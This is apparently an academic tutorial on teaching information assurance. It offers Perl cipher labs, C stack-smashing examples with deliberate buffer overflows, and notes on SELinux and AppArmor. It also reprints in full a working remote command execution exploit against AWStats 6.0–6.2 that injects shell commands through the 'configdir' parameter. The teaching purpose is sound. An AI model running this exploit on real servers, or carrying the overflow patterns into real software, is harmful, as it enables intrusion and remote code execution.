Tutorial on Adding Information Assurance to the Curriculum
Richard Weiss* and Isaac Overcast
The Evergreen State College
Topics to explore
- Cryptography: Caesar cipher, Vigenere, RSA, cracking passwords
- Network protocols and tools: OpenSSL, viruses, worms, DoS, TCP SYN flooding
- Assembly language: stack smashing
- Secure OS: SELinux, AppArmor (SUSE)
- Database: translucent databases
- Technology and society
Labs that I have prepared:
- programming ciphers in Perl
- stack smashing and assembly language
- using nmap, Metasploit, and other network tools
Symmetric Ciphers in Perl
Lab 1
- about Perl: scalar variables start with $, and
  $var = <STDIN>;
  will read a line from the keyboard
- programming a Caesar cipher: there is a concise way to do substitution in Perl:
  $Text =~ tr/a-zA-Z/b-zaB-ZA/;
- programming a Vigenere cipher: Perl has split(//, $text), ord, chr;
  array variables begin with @, e.g.
  @num_array = split(/ /, $num);
Program:
#!/usr/bin/perl
# Lab 1
# modify the following script
# to prompt the user for the plaintext and get it from the
# keyboard using <STDIN>.
# Then encrypt the plaintext with a Caesar cipher using a key
# also input using <STDIN>
# expand this program to include a vigenere cipher:
# prompt the user for a key and the plain text
use strict;
use warnings;
my $Text = "EASTERN WASHINGTON UNIVERSITY";
my $key = 3;
# the same shift of 3 done in a single tr///:
#$Text =~ tr/a-zA-Z/d-za-cD-ZA-C/;
# shift every letter by one, $key times (wrapping z->a and Z->A)
for (my $i = 0; $i < $key; $i++) {
    $Text =~ tr/a-zA-Z/b-zaB-ZA/;
}
print $Text . "\n";
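One way to complete the exercise, as an added example that is not the handout's own script: it reads the plaintext and key from the keyboard and builds both ciphers from split(//, ...), ord and chr; the function names (shift_char, caesar, vigenere) are my own.

```perl
#!/usr/bin/perl
# Added example (not the lab handout's own script): Caesar and Vigenere
# ciphers built from split(//, ...), ord and chr, as the Lab 1 notes suggest.
use strict;
use warnings;

# Shift one letter by $shift positions, keeping its case; other characters
# pass through unchanged. Perl's % is non-negative for a positive modulus,
# so a negative $shift (decryption) needs no special handling.
sub shift_char {
    my ($ch, $shift) = @_;
    return $ch unless $ch =~ /[A-Za-z]/;
    my $base = ($ch =~ /[a-z]/) ? ord('a') : ord('A');
    return chr($base + (ord($ch) - $base + $shift) % 26);
}

# Caesar cipher: every letter is shifted by the same numeric key.
sub caesar {
    my ($text, $key) = @_;
    return join('', map { shift_char($_, $key) } split(//, $text));
}

# Vigenere cipher: the i-th letter is shifted by the i-th keyword letter
# (A=0 .. Z=25). The key index only advances on letters, so spaces and
# punctuation do not consume key material. $decrypt reverses the shift.
sub vigenere {
    my ($text, $keyword, $decrypt) = @_;
    my @key = map { ord(uc $_) - ord('A') } grep { /[A-Za-z]/ } split(//, $keyword);
    die "keyword needs at least one letter\n" unless @key;
    my ($i, $out) = (0, '');
    for my $ch (split(//, $text)) {
        if ($ch =~ /[A-Za-z]/) {
            my $k = $key[$i++ % @key];
            $out .= shift_char($ch, $decrypt ? -$k : $k);
        } else {
            $out .= $ch;
        }
    }
    return $out;
}

# Interactive use, as the lab asks: read plaintext and key from the keyboard;
# a purely numeric key selects Caesar, a word selects Vigenere.
if (!caller) {
    print "Plaintext: ";
    chomp(my $text = <STDIN> // '');
    print "Key (number for Caesar, word for Vigenere): ";
    chomp(my $key = <STDIN> // '');
    print(($key =~ /^\d+$/ ? caesar($text, $key) : vigenere($text, $key, 0)) . "\n");
}
```

Decryption is the same routine with the shift negated, which is why shift_char accepts a negative argument.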
Lab 2
The following examples were taken from "Smashing the Stack for Fun and Profit". However, the second one doesn't seem to
work. You need to experiment with core dumps to see what is going on, or use print statements for
the memory addresses.
-
/***************************
example2.c
stack smashing,
simple buffer overflow
Oct, 2006
**************************/
#include <string.h>

/* copies a caller-supplied string into a 16-byte stack buffer with no
   length check: anything longer than 15 characters overwrites whatever
   sits above the buffer on the stack, including the saved return address */
void overflow(char *str) {
    char buffer[16];
    strcpy(buffer, str);
}
/*******************
main
******************/
int main(void) {
    char large_string[256];
    int i;
    for (i = 0; i < 255; i++) {
        large_string[i] = 'A';
    }
    large_string[255] = '\0';   /* terminate so strcpy stops after 255 bytes */
    overflow(large_string);
    return 0;
}
-
/***************************
example3.c
stack smashing,
buffer overflow
Oct, 2006
**************************/
#include <stdio.h>

/* ret is pointed 12 bytes past buffer1, where the article's frame layout
   placed the saved return address, and that address is advanced by 8 so
   that the "x = 1;" in main is skipped. The offsets depend on the compiler
   and optimisation level, which is why the demo may not behave as expected. */
void overflow(int a, int b, int c) {
    char buffer1[5];
    char buffer2[10];
    int *ret;
    ret = (int *)(buffer1 + 12);
    (*ret) += 8;
}
/*******************
main
******************/
int main(void) {
    int x;
    x = 0;
    overflow(1, 2, 3);
    x = 1;
    printf("%d\n", x);   /* prints 0 if the return address was redirected */
    return -1;
}
Demo
Metasploit allows you to write Perl scripts to automate exploits. An example of a Perl script
that comes with the Metasploit download is an exploit for AWStats, shown below.
#!/usr/bin/perl
#---GHC------------------------------#
#Remote command execution exploit #
#Product: #
#Advanced Web Statistics 6.0 - 6.2 #
#URL:http://awstats.sourceforge.net #
#Greets & respects to our friends: #
#1dt.w0lf and all rst.void.ru #
#Special greets 2 d0G4 #
#& cr0n for link on bugtraq #
#---not-PRIVATE-already--------------#
# bug found by iDEFENSE #
# http://www.idefense.com/ #
# application/poi/display? #
# id=185&type=vulnerabilities #
# &flashstatus=true #
#------------------------------------#
use IO::Socket;
$banner = "
#################################################################
GHC 2005
Remote command execution exploit for:
Advanced Web Statistics 6.0 - 6.2
Usage:
>perl ./GHCaws.pl www.server.net /cgi-bin/awredir.pl \"uname -a\"
#################################################################
";
$bug_param = 'configdir';
$id_start = 'b_exp';
$id_exit = 'e_exp';
$id_print = 0;
$http_head = "\n\n";
sub Print_Report {
    $str = $_[0];
    if ($str =~ m/$id_exit/i) {
        exit;
    }
    if ($str =~ m/$id_start/i) {
        $str =~ s/$id_start//ig;
        $id_print = 1;
    }
    if ($id_print == 1) {
        print "$str";
    }
}
sub ConnectServer {
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80")
        || die "Error\n";
    print $socket "GET $dir".'?'.$bug_param.'='."$expl HTTP/1.1\n";
    print $socket "Host: $server\n";
    print $socket "Accept: */*\n";
    print $socket "Connection: close\n\n";
    while ($report = <$socket>) {
        &Print_Report("$report");
    }
}
print "$banner";
if ($ARGV[0] && $ARGV[1] && $ARGV[2]) {
    $server = $ARGV[0];
    $dir = $ARGV[1];
    $cmd = $ARGV[2];
}
else {
    exit;
}
$expl = '|echo '.''.';echo '.$id_start.';'.$cmd.';echo '.$id_exit.';%00';
$expl =~ s/\W/"%".sprintf("%x",ord($&))/eg;
&ConnectServer;
Secure OS
The problem
The main problem seems to be that in traditional OSes, some programs need to run
with root or administrator privileges in order to perform their tasks, e.g. reading and writing e-mail
files. What you want is finer granularity: give programs the power to access hardware,
create other processes, and access specific files and directories, without giving them
omnipotence.
Mandatory Access Control and SELinux
With MAC, the only thing the superuser account is used for is maintaining the global security policy. This
makes it much more difficult to compromise the system and usually requires physical access.
SELinux implements three different types of MAC:
- Type enforcement (TE): every system object has a security type.
- Role-based access control (RBAC): users are assigned roles, which define the actions and
contexts in which that user can participate.
- Multi-level security (MLS): defines access controls against objects based on data classification
(sensitivity).
Major system applications must be SELinux-aware wherever possible, and it also requires extensive setup by a
knowledgeable system administrator (that is, one who has carefully researched SELinux). On the one hand,
SELinux is truly comprehensive. On the other hand, configuring it is a fairly major undertaking.
AppArmor
"Novell AppArmor has a more modest objective: to restrict the behavior of selected applications in a
very granular but targeted way. In focusing on applications (at the expense of roles and data classification),
AppArmor is built on the assumption that the single biggest attack vector on most systems is application
vulnerabilities. If the application's behavior is restricted, the behavior of any attacker who succeeds
in exploiting some vulnerability in that application also will be restricted."
Bibliography
- Aleph One, Smashing the Stack for Fun and Profit, 2001,
http://reactor-core.org/stack-smashing.html, retrieved June 2006.
- CERT, TCP SYN Flooding and IP Spoofing Attack, 1996,
http://www.cert.org/advisories/CA-1996-21.html, retrieved June 2006.
- Baase, S., A Gift of Fire, Prentice Hall, 2003.
- Bejtlich, R., The Tao of Network Security Monitoring, Addison-Wesley, 2004.
- Brumley, D., Invisible Intruders: Rootkits in Practice, 1999,
www.usenix.org/publications/login/1999-9/features/rootkits.html, retrieved June 2006.
- Easttom, C., Computer Security Fundamentals, New Jersey, Prentice Hall, 2006.
- Erickson, J., Hacking: The Art of Exploitation, No Starch Press, 2003.
- Garfinkel, S., Spafford, G., Practical Unix & Internet Security, O'Reilly, 1996.
- Guttman, J.D. et al., Verifying Information Flow Goals in Security-Enhanced Linux, 2004,
www.ccs.neu.edu/home/guttman/selinux.pdf, retrieved June 2006.
- Hoglund, G., McGraw, G., Exploiting Software, Boston, Addison-Wesley, 2004.
- Kahn, D., The Codebreakers, Scribner, 1967.
- Mel, H.X., Baker, D., Cryptography Decrypted, Addison-Wesley, 2001.
- Menezes, A., van Oorschot, P., Vanstone, S., Handbook of Applied Cryptography, CRC Press, 1996.
- O'Harrow, R., No Place to Hide, New York, Free Press, 2005.
- Rosen, K., Discrete Mathematics and Its Applications, New York, McGraw Hill, 2003.
- Schneier, B., Applied Cryptography, New York, John Wiley and Sons, 1996.
- Singh, S., The Code Book, New York, Anchor Books, 1999.
- Stoll, C., The Cuckoo's Egg, New York, Pocket Books, 1990.
- Wayner, P., Translucent Databases, Baltimore, Flyzone Press, 2002.
Acknowledgements
Richard Weiss was supported by NSF grant 0416630